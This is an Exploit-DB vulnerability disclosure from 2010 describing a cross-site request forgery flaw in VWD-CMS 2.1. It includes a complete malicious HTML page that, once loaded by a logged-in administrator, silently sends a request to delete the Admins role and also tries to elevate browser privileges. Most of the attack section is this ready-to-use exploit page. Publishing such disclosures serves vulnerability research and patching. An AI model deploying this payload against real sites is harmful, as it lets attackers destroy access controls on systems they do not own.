VWD-CMS - Cross-Site Request Forgery

EDB-ID:

15058

CVE:

N/A


Author:

Abysssec

Type:

webapps


Platform:

ASP

Date:

2010-09-20


'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 


 
 
  Title            :  VWD-CMS CSRF Vulnerability
  Affected Version :  VWD-CMS version 2.1
  Discovery        :  www.abysssec.com
  Vendor	   :  http://www.vwd-cms.com/

  Demo  	   :  http://server/templates/Emerald.aspx
		      http://server/templates/balloonr.aspx

  Download Links   :  http://vwdcms.codeplex.com/
  
  Admin Page       :  http://Example.com/login.aspx
  
http://www.exploit-db.com/moaub-20-vwd-cms-csrf-vulnerability/
'''
 
1)CSRF :
===========================================================================================      
  The VWD-CMS have CSRF Vulnerability in order to remove any Role especially Admins Role. 
  With this Vulnerability you can navigate the admin to visit malicious site (when he is already logged in) 
  to remove a role.

 In this path a role could be removed::
        http://Example.com/VwdCms/Members/RoleEdit.aspx?delete=yes&role=RoleName
        (RoleName can be Admins or Members)
  
  here is HTML File with AJAX Code and with GET Method for this operation that is enough to Admin meet it.


The Source of HTML Page (Malicious Site) 
===========================================================================================     
  

<html>
<head>
<title >Wellcome to My Site!</title>
Hello!
...
...
...
This page remove Admins Role in VWD-CMS. 

<script>          
        function RemoveRole() {            
            try {
                netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
            } catch (e) {}

            var http = false;
            if (window.XMLHttpRequest) {
                http = new XMLHttpRequest();
            }
            else if (window.ActiveXObject) {
                http = new ActiveXObject("Microsoft.XMLHTTP");                
            }

            url = "http://server/VwdCms/Members/RoleEdit.aspx?delete=yes&role=Admins";
            http.onreadystatechange = done;
            http.open('GET', url, true);
            http.send(null);
        }
        function done() {
            if (http.readyState == 4 && http.status == 200) 
            {               
            }
        }     
</script>
</head>
<body onload ="RemoveRole();">
</body>
</html>



===========================================================================================